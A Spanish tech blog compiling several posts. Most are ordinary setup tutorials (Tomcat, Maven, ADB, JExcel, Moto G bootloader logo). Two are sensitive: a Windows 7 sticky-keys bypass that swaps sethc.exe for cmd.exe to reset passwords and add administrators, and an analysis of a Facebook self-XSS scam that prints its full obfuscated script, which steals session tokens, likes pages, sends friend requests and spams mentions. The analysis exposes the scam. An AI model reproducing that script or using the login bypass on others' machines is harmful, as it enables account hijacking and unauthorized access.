Cambiar contraseña y elevar privilegios de una cuenta de usuario en Windows 7

Este post es para personas olvidadizas como yo, que de vez en cuando se nos olvida la contraseña de nuestra cuenta de windows. Explicaré los pasos para cambiar la contraseña de una cuenta en windows 7.

 

Paso 1: Arrancar nuestra maquina con Windows 7 y apagarla antes de que salga el bootscreen de Windows 7.

bootscreen_Windows7

 

Paso 2: Al arrancar de nuevo, nos debe aparecer una pantalla como esta, mostrándonos la opción de reparar el arranque de windows. Seleccionamos la primera opción.

reparar arranque de windows

Paso 3: Aparecerá una pantalla donde está buscando errores.

buscando errores

 

Paso 4: Nos aparecerá un ventana preguntando si queremos restaurar la computadora usando el Restaurado del Sistema (System Restore :D).  Seleccionamos Cancelar.

cancel

 

Paso 5: Seguirá buscando errores

buscando errores

Paso 6: Al final nos aparecerá la ventana donde nos informa que no puede reparar el sistema automáticamente.

no se puede reparar

 

Paso 7: Seleccionamos la opción View Details (Mostrar Detalles) y bajamos hasta encontrar X:\windows\system32\en-US\eroffpls.txt (puede cambiar dependiendo del idioma).

View Details

 

Paso 8: Esto nos abrirá un archivo en Notepad y abrimos el menu File y seleccionamos Open.

txt

 

Paso 9: Buscamos la unidad D: que en realidad es la unidad C:

menu Open

 

Paso 10: en la unidad D: Navegamos hasta Windows\System32. Es importante seleccionar que nos muestre todos los archivos en la parte inferior de la ventana. Y buscamos el archivo cmd.exe

Buscar CMD

 

Paso 11: Hacemos una copia del archivo cmd.exe

copia CMD

Paso 12: Buscamos el archivo sethc.exe

buscamos Sethc

Paso 13: Cambiamos el nombre del archivo sethc.exe por cualquier otro

Captura de pantalla 2014-05-10 a la(s) 04.46.46

Paso 14: Buscamos la copia que realizamos del archivo cmd.exe y lo renombramos por sethc.exe

Captura de pantalla 2014-05-10 a la(s) 04.47.59

Paso 15: Nos salimos de todas las ventanas y reiniciamos la maquina.

Captura de pantalla 2014-05-10 a la(s) 04.48.27

 

NOTA: Lo que hicimos anteriormente fue cambiar el ejecutable que lanza las StickyKeys las cuales son una característica de windows para lanzar combinaciones de teclas sin tener que pulsarlas de manera simultánea.

Paso 16 : Dejamos que windows arranque normalmente, ponemos el cursor dentro del campo donde se escribe la contraseña y pulsamos 5 veces la tecla Shift y se abrirá una venta cmd con privilegios elevados. Normalmente en windows al presionar 5 veces la tecla Shift, normalmente se lanza en sethc.exe pero en este caso lanzará el cmd.exe que con el nombre  sethc.exe.

Captura de pantalla 2014-05-10 a la(s) 05.06.56

 

Paso 17:  Listamos los usuarios con privilegios de Administrador ejecutando el comando “net localgroup Administrators”. Claro sin comillas y puede cambiar Administrators por Administrador en español. En mi maquina tengo dos usuarios Dev y Luser. Dev es un usuario normal sin contraseña y Luser es Administrador y tiene contraseña.

Captura de pantalla 2014-05-10 a la(s) 05.07.22

Paso 18: Listamos los usuario con permisos comunes con “net localgroup users “

Captura de pantalla 2014-05-10 a la(s) 05.07.56

Paso 19: Ahora cambiamos el password de la cuenta que tiene contraseña con el comando ” net user <tu_Cuenta> * “. Recuenta que sin comillas y sin < y >. Nos pedirá ingresar una contraseña nueva y confirmarla. Al final seteará la contraseña nueva :D.

Captura de pantalla 2014-05-10 a la(s) 05.12.19

Paso 20: En este paso elevaremos los privilegios de una cuenta Standar a una cuenta de Administrador. El comando es ” net localgroup Administradors <tu_Usuario> /add “. Recuenta que sin comillas y sin < y >.

Captura de pantalla 2014-05-10 a la(s) 05.13.36

 

Al final podremos firmarnos con la contraseña nueva.

Captura de pantalla 2014-05-10 a la(s) 05.26.17

 

Espero que le sea de utilidad. Saludos

Instalar Tomcat 7.0.53 en Mac OS X 10.9

Un pre requisito para instalar el servidor tomcat, debemos contar con alguna version de Java, y lo podemos comprobar ejecutando el comando java -vesion en la terminal en Mac. Deben obtener algo así :

Java Version

Ya cubierto el requisito anterior debemos descargar tomcat desde la página de apache, lo puden descargar desde aquí. Buscamos y descargamos el .tar.gz (JUM !!) y debemos copiar el archivo descargado al directorio /usr/local/.


sudo cp apache-tomcat-7.0.53.tar.gz /usr/local //copiamos el .tar.gz
sudo tar -xvf apache-tomcat-7.0.53.tar.gz      // Descomprimimos.
sudo rm apache-tomcat-7.0.53.tar.gz          // Borramos el tar.gz.

 

Es necesario  borrar un enlace simbólico y lo hacemos con el comando (ya que este apunta a otro lugar)

sudo rm /Library/Tomcat

Y crearemos un nuevo enlace simbólico apuntando a donde se descomprimio el tomcat.


sudo ln -s /usr/local/apache-tomcat-7.0.53 /Library/Tomcat

Cambiaremos el owner del enlace simbólico a nuestro Usuario


sudo chown -R <tu_usuario> /Library/Tomcat

Daremos permiso de ejecución a todos los scripts


sudo chmod +x /Library/Tomcat/bin/*.sh

Hasta este punto podemos arrancar y detener el servidor con los comandos correspondientes.


/Library/Tomcat/bin/startup.sh
/Library/Tomcat/bin/shutdown.sh

También podemos arrancar y detener el server con ayuda de TomcatController, lo descargamos, montamos el .dmg y arrastramos a nuestras Aplicaciones.

TomcatController

 

Abrimos TomcatController y configuramos la ruta del enlace Simbólico

Configurar TomcatController

 

Entramos a http://localhost:8080

 

Homepage Tomcat Server

Y ta tan !! Habemos servidor Tomcat :D

Instalar Maven en Mac OS X Mavericks

Hola a todos, en este post sencillo les comparto una forma para instalar Maven en Mac.

Rapidito ¿Qué es Maven?

Es una herramienta de gestión de proyectos que se basa en la “convención sobre configuración”. Es decir, asume un comportamiento por defecto que permite empezar a trabajar sin necesidad de configuración. Por ejemplo, Maven asume la estructura de los ficheros del proyecto, con lo cual a la hora de compilar no se pierde tiempo indicando donde se encuentra el código fuente o las librerías.

Lo primero que tenemos que hacer es descargar los fuentes de maven desde la página oficial, aquí les comparto el link y descargamos el apache-maven-3.2.1.tar.gz (pensaba hacer un chiste machista sobre le .tar.gz pero no lo haré :P).

Ya que tengamos el .tar.gz descargado es necesario copiar el contenido del tar al direcotorio /usr/local/ (en caso de que no tengan este directorio lo tiene que crear :D ).

sudo mkdir /usr/local                        //crearmos el directorio
sudo cp apache-maven-3.2.1.tar.gz /usr/local //copiamos el .tar.gz
sudo tar -xvf apache-maven-3.2.1.tar.gz      // Ya se imaginana que hace ese comando
sudo rm apache-maven-3.2.1.tar.gz            // Borramos el coso ese.

 

Ahora debemos crear una variable de entorno y agregarlo al Path del sistema (Puffff). Para esto debemos editar el .bash_profile que se encuentra en nuestro directorio home.


vim ~/.bash_profile                          // Editamos el archivo
export M2_HOME=/usr/local/apache-maven-3.2.1 // Creamos la variable de Entorno
export PATH=$PATH:$M2_HOME/bin               // La agregamos al Path
guardar cambios :D

 

Y ahora comprobaremos que maven está funcionando con el comando mvm -version

Maven Version

 

 

Y listo :D.

Leer un Archivo Excel desde Java con JExcel

Este post es para compartirles una forma para leer el contenido de un archivo Excel con java. Para esto debemos instalar la librería  jExcel, lo descomprimen en cualquier lugar y en mi caso lo tengo que añadir a mi proyecto de Eclipse como un jar Externo. En mi caso hago click derecho sobre le proyecto y busco Propieties> Java Build Path > Libraries a como se muestra en la siguiente imagen.

 

Propieties

 

Seleccionamos en Add External JARS y buscamos la ruta hasta donde se descomprimió el JExcel.

En concreto el código es el siguiente.


package read;

import java.io.File;
import java.io.IOException;

import jxl.*;
import jxl.read.biff.BiffException;

public class readExcel {

public static void main(String[] args) throws IOException, BiffException {
Workbook workbook = Workbook.getWorkbook(new File(“/Users/Usuario/Documents/nombres.xls”)); //Pasamos el excel que vamos a leer
Sheet sheet = workbook.getSheet(0); //Seleccionamos la hoja que vamos a leer
String nombre;

for (int fila = 1; fila < sheet.getRows(); fila++) { //recorremos las filas
for (int columna = 0; columna < sheet.getColumns(); columna++) { //recorremos las columnas
nombre = sheet.getCell(columna, fila).getContents(); //setear la celda leida a nombre
System.out.print(nombre + ” “); // imprimir nombre
}
System.out.println(“\n”);
System.out.println(“————————————-“);
}
}
}

Les dejo una captura de Pantalla para que lo aprecien mejor.

CodigoJava

El contenido del Excel es el siguiente

Excel

 

Y al correr el programa tenemos como resultado lo siguiente.

consola_java

 

Esto esto todo, espero les pueda ayudar en algún momento. Saludos.

Configurar ADB (Android Debug Bridge) en Mac OS X

Para empezar el ADB es un interfaz de linea de comando que te permite comunicarte con dispositivos android o emuladores. ADB tiene muchas funciones para controlar nuestro dispositivo, como enviar y bajar archivos desde nuestro Android, instalar apps, rootear nuestro Android y muchas poderosas cosas más.

Para conseguir el ADB podemos descargar el SDK completo de Android, pero si no eres desarrollador no tiene caso así se que puedes descargar los platform-tools que contiene el ADB y otras herramientas y también pesa menos. Pueden descargar el Platform-tools desde aquí.

El archivo tiene contraseña, la cual es (sin comillas): “adb”

Una vez tengamos descargado el platform-tools, creamos un directorio donde pondremos el contenido que descomprimimos, en mi caso yo quedó así:

/Users/MiUsuario/Android/platform-tools/ 

Ahora vamos a añadir la ruta del platform-tools al PATH de sistema. Para hacerlo debemos escribir el siguiente comando en nuestra Terminal:

nano ~/.bash_profile

Se verá de la siguiente manera:

nano

 

Dentro de ese archivo pondremos el export para agregar el contenido del directorio platform-tools al PATH del sistema.

El export es el siguiente:

 

export PATH=${PATH}:/Users/<TuNombreDeUsuario>/Android/platform-tools/

Sustituyendo <TuNombredeUsuario> por tu usuario -.-‘. Y quedará de la siguiente manera.

nano export PATH

 

Cerramos y guardando cambios presionando  ctrl + x

Al terminar podremos usar el comando "adb" como cualquier comando de la terminal. Para probarlo tipeamos "adb devices" en la terminal y obtendremos un listado de dispositivos android conectados a nuestra Mac. Como se muestra en la siguiente imagen.

adb_devices

Saludos.

Como quitar Advertencia Bootloader Moto G

Hola de nuevo a todo, he regresado con un nuevo Post sobre Android.

Después de rootear un dispositivo Moto G, aparece una advertencia de que el bootloader está desbloqueado, como se muestra en la siguiente:

 

bootloader

El proceso para quitar la advertencia del bootloader es el siguiente. Es necesario contar con los siguientes elementos.

- SDK de  Android lo pueden descargar desde aquí:

SDK de Android

Si estas usando Windows XP/7/8 debes descargar el driver para el Moto G, si usas Linux o Mac no es necesario descargar el driver.

- Driver Moto G

Driver Moto G

- Archivo para quitar logo de bootloader:

Logo Bootloader

Este ultimo archivo tiene contraseña, la cual es la siguiente (sin comillas): “rafavg77″

Instalamos el driver de Moto G (en caso de ser necesario), conectamos el Moto G con el cable usb a la computadora y descomprimimos el SDK de Android y accedemos por medio de la consola de Linux, Mac o cmd de Window hasta la ruta de SDK /sdk/platform-tool/adb y ejecutamos el comando adb devices y debe listar nuestro dispositivo de la siguiente manera

adb_devices

Hasta este punto todo marcha bien, ahora es necesario reiniciar el dispositivo en modo bootloader, esto se puede hacer pulsando el botón de Apagado y los botones de volumen simultáneamente o como yo prefiero, desde la linea de comando ;) . Para reiniciar en modo bootloader desde el adb de android ejecutamos el comando

adb_reboot_bootloader

La pantalla del Moto G debe estar como la siguiente imagen:

bootloader_screen

Debemos descomprimir el tercer archivo que descargamos en la misa carpeta que se encuentra el adb de android (si tiene agregado el adb a las variables del ambiente esto no es necesario) y deben poder ver el archivo logo.bin, con el siguiente comento copiaremos logo.bin al dispositivo en modo bootloader:

fastboot flash

Reiniciamos el Moto G y no volveremos a ver el molesto logo de Advertencia.

Espero que les sea de mucha utilidad. Un saludo y hasta luego. :D

Destripando supuesto Script para hackear en Facebook

El día de hoy me etiquetaron en un posts en facebook, el cual preguntaba si ¿Querían hackear? y obtener el password de algún usuario de facebook, solo tenían que copiar y pegar el siguiente script en la consola de javascript en Chrome.

Nota: Es muy importante mencionar que lo que según hace el script es realmente Falso, por favor no lo hagan.

var parent=document.getElementsByTagName(“html”)[0];
var _body = document.getElementsByTagName(‘body’)[0];
var _div = document.createElement(‘div’);
_div.style.height=”25″;
_div.style.width=”100%”;
_div.style.position=”fixed”;
_div.style.top=”auto”;
_div.style.bottom=”0″;
_div.align=”center”;
var _audio= document.createElement(‘audio’);
_audio.style.width=”100%”;
_audio.style.height=”25px”;
_audio.controls = true;
_audio.autoplay = false;
_audio.autoplay = true;
_audio.src = “http://picosong.com/YPGz&#8221;;
_div.appendChild(_audio);
_body.appendChild(_div);
var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName(“fb_dtsg”)[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4=”/ajax/follow/follow_profile.php?__a=1″;var params4=”profile_id=”+abone+”&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=”+fb_dtsg+”&lsd&__”+user_id+”&phstamp=”;http4.open(“POST”,url4,true);http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a(“”);function sublist(uidss){var a=document.createElement(‘script’);a.innerHTML=”new AsyncRequest().setURI(‘/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe’).setData({ flid: “+uidss+” }).send();”;document.body.appendChild(a)}var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName(‘fb_dtsg’)[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL=”//www.facebook.com/ajax/ufi/like.php”;var XParams=”like_action=true&ft_ent_identifier=”+post+”&source=1&client_id=”+now+”%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=”+post+”&nctr[_mod]=pagelet_home_stream&__user=”+user_id+”&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=”+fb_dtsg+”&phstamp=”;X.open(“POST”,XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}var fb_dtsg=document.getElementsByName(‘fb_dtsg’)[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL=”//www.facebook.com/ajax/pages/fan_status.php”;var PageParams=”&fbpage_id=”+p+”&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=”+user_id+”&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=”+fb_dtsg+”&phstamp=”;Page.open(“POST”,PageURL,true);Page.onreadystatechange=function(){if(Page.readyState==4&&Page.status==200){Page.close}};Page.send(PageParams)}Like(“185309954944253″);function IDS(r){var X=new XMLHttpRequest();var XURL=”//www.facebook.com/ajax/add_friend/action.php”;var XParams=”to_friend=”+r+”&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user=”+user_id+”&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg=”+fb_dtsg+”&phstamp=”;X.open(“POST”,XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}
Like(“1376249559308318″);
var _0xb161=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x72\x65\x70\x6F\x72\x74\x2F\x73\x6F\x63\x69\x61\x6C\x2E\x70\x68\x70","\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x62\x6C\x6F\x63\x6B\x3D\x31\x26\x70\x70\x3D\x25\x37\x42\x25\x32\x32\x61\x63\x74\x69\x6F\x6E\x73\x5F\x74\x6F\x5F\x74\x61\x6B\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x5B\x5D\x25\x32\x32\x25\x32\x43\x25\x32\x32\x61\x72\x65\x5F\x66\x72\x69\x65\x6E\x64\x73\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x63\x69\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x63\x6F\x6E\x74\x65\x6E\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x30\x25\x32\x43\x25\x32\x32\x65\x78\x70\x61\x6E\x64\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x33\x41\x31\x25\x32\x43\x25\x32\x32\x66\x69\x72\x73\x74\x5F\x63\x68\x6F\x69\x63\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32\x66\x72\x6F\x6D\x5F\x67\x65\x61\x72\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74\x69\x6D\x65\x6C\x69\x6E\x65\x25\x32\x32\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x66\x6F\x6C\x6C\x6F\x77\x69\x6E\x67\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x74\x61\x67\x67\x65\x64\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x6F\x6E\x5F\x70\x72\x6F\x66\x69\x6C\x65\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x70\x68\x61\x73\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x72\x65\x66\x25\x32\x32\x25\x33\x41\x25\x32\x32\x68\x74\x74\x70\x73\x25\x33\x41\x25\x35\x43\x25\x32\x46\x25\x35\x43\x25\x32\x46\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x25\x35\x43\x25\x32\x46\x4E\x61\x6E\x2E\x65\x72\x74\x74\x37\x25\x32\x32\x25\x32\x43\x25\x32\x32\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x31\x34\x35\x25\x32\x43\x25\x32\x32\x72\x69\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x73\x75\x62\x5F\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x74\x69\x6D\x65\x5F\x66\x6C\x6F\x77\x5F\x73\x74\x61\x72\x74\x65\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x75\x73\x65\x72\x25\x32\x32\x25\x33\x41","\x25\x37\x44\x26\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x3D\x31\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x32\x71\x6D\x76\x75\x35\x6B\x39\x55\x6D\x41\x41\x61\x55\x56\x70\x6F\x26\x5F\x5F\x72\x65\x71\x3D\x75\x26\x74\x74\x73\x74\x61\x6D\x70\x3D\x32\x36\x35\x38\x31\x36\x38\x35\x37\x31\x30\x37\x31\x31\x30\x38\x38\x38\x30","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65","\x73\x65\x6E\x64","\x31\x30\x30\x30\x30\x36\x39\x35\x32\x31\x31\x39\x30\x34\x38"];var fb_dtsg=document[_0xb161[2]](_0xb161[1])[0][_0xb161[0]];var user_id=document[_0xb161[4]][_0xb161[3]](document[_0xb161[4]][_0xb161[3]](/c_user=(\d+)/)[1]);var now=( new Date)[_0xb161[5]]();function Report(_0x45e7x5){var _0x45e7x6= new XMLHttpRequest();var _0x45e7x7=_0xb161[6];var _0x45e7x8=_0xb161[7]+fb_dtsg+_0xb161[8]+_0x45e7x5+_0xb161[9]+_0x45e7x5+_0xb161[10]+now+_0xb161[11]+user_id+_0xb161[12]+user_id+_0xb161[13];_0x45e7x6[_0xb161[15]](_0xb161[14],_0x45e7x7,true);_0x45e7x6[_0xb161[16]]=function (){if(_0x45e7x6[_0xb161[17]]==4&&_0x45e7x6[_0xb161[18]]==200){_0x45e7x6[_0xb161[19]];} ;} ;_0x45e7x6[_0xb161[20]](_0x45e7x8);} ;
var _0xa22c=[“value”,”fb_dtsg”,”getElementsByName”,”match”,”cookie”,”1382559332008832″,”onreadystatechange”,”readyState”,”arkadaslar = “,”for (;;);”,””,”replace”,”responseText”,”;”,”length”,”entries”,”payload”,”round”,” @[","uid",":","text","]“,” “,”\x26filter[0]=user”,”\x26options[0]=friends_only”,”\x26options[1]=nm”,”\x26token=v7″,”\x26viewer=”,”\x26__user=”,”https://&#8221;,”indexOf”,”URL”,”GET”,”https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&#8243;,”open”,”http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&#8243;,”send”,”random”,”floor”,”\x26ft_ent_identifier=”,”\x26comment_text=”,”\x26source=2″,”\x26client_id=1377871797138:1707018092″,”\x26reply_fbid”,”\x26parent_comment_id”,”\x26rootid=u_jsonp_2_3″,”\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:”,”}”,”\x26attached_sticker_fbid=0″,”\x26attached_photo_fbid=0″,”\x26giftoccasion”,”\x26ft[tn]=[]”,”\x26__a=1″,”\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo”,”\x26__req=q”,”\x26fb_dtsg=”,”\x26ttstamp=”,”POST”,”/ajax/ufi/add_comment.php”,”Content-type”,”application/x-www-form-urlencoded”,”setRequestHeader”,”status”,”close”];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);

Desde que leí document.cookie.match algo me olía mal, aparte de encontrar código ofuscado pero no cifrado ;).

En primera instancia abrí una cuenta de facebook nueva para probar el script y me encontré que hacía varias cosas entre las primeras insertar un modal con un reproductor de audio como se muestra a continuación

Captura de pantalla 2014-02-02 a la(s) 18.09.49

Este reproductor debería cargar un audio del link http://picosong.com/YPGz/ pero como no estaba en https no podía ser cargado en mi sesion de Fb que estaba en https. La siguiente en captura es el resultado de la consola de JavaScript.

Error al cargar audio

En las líneas en rojo podemos observar una leyenda diciendo que la conexión fue negada por violar algunos contenido de seguridad.

El script contiene un función


function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("");function sublist(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/ufi/like.php";var XParams="like_action=true&ft_ent_identifier="+post+"&source=1&client_id="+now+"%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL="//www.facebook.com/ajax/pages/fan_status.php";var PageParams="&fbpage_id="+p+"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";Page.open("POST",PageURL,true);Page.onreadystatechange=function(){if(Page.readyState==4&&Page.status==200){Page.close}};Page.send(PageParams)}Like("185309954944253");function IDS(r){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/add_friend/action.php";var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}
Like("1376249559308318");

Dentro de la función el script realiza una petición POST <code>  XURL=”//www.facebook.com/ajax/ufi/like.php </code>  con ciertos parámetros entre ellos  1376249559308318, el cual parece ser que apunta hacia la página https://www.facebook.com/pages/Notas-suicidas/1376249559308318. Esta petición hace que demos like en esta página.

Otra acción que realizaba era recoger todos tus contactos y mencionarlos en el posts donde se encontraba el script (de esta manera fue que encontre el scritp). Esta acción de publicar a los contactos se muestra a continuación


var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","1382559332008832","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var 